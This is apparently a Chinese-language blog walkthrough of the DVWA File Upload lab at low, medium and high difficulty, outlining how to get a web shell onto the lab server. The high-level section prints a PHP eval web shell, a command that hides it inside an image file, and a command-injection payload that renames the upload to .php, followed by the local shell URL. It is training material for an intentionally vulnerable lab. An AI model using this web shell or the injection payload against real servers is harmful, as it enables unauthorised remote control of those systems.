【dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦

目录

一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

[3.4、上传文件 ,成功后复制路径](#3.4、上传文件 ,成功后复制路径)

[3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件](#3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件)

​3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

3.7、蚁剑连接:木马链接和木马密码


一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

<?php @eval($_POST['pass']);?>

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

copy 真实图片.后缀名/b+木马文件.后缀名 木马图片.真实图片后缀名

3.4、上传文件 ,成功后复制路径

3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件

127.0.0.1|move ../../hackable/uploads/你的木马图片 ../../hackable/uploads/修改后的木马文件

例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php

3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回车,变成下方的木马文件链接

http://127.0.0.1/dvwa/hackable/uploads/mua.php

3.7、蚁剑连接:木马链接和木马密码

相关推荐
黑客笔记19 分钟前
ChatGPT超级AI对话模型 黑客十问十答
人工智能·web安全·网络安全
你怎么睡得着的!8 小时前
【护网行动-红蓝攻防】第一章-红蓝对抗基础 认识红蓝紫
网络·安全·web安全·网络安全
anddddoooo12 小时前
域内证书维权
服务器·网络·网络协议·安全·网络安全·https·ssl
顾比魁18 小时前
pikachu之CSRF防御:给你的请求加上“网络身份证”
前端·网络·网络安全·csrf
廾匸070518 小时前
《95015网络安全应急响应分析报告(2024)》
网络安全·行业报告·应急响应
仇辉攻防18 小时前
【云安全】云原生- K8S 污点横移
web安全·网络安全·云原生·容器·kubernetes·k8s·安全威胁分析
渗透测试老鸟-九青1 天前
HW面试经验分享 | 北京蓝中研判岗
网络·经验分享·安全·网络安全·面试·渗透·代码审计
火绒终端安全管理系统2 天前
火绒终端安全管理系统V2.0【系统防御功能】
网络·安全·网络安全·火绒安全·火绒
H轨迹H2 天前
BUUCTF-Web方向16-20wp
网络安全·渗透测试·ctf·buuctf
D-river2 天前
【如何基于Debian构建Kali Linux】
linux·网络·安全·网络安全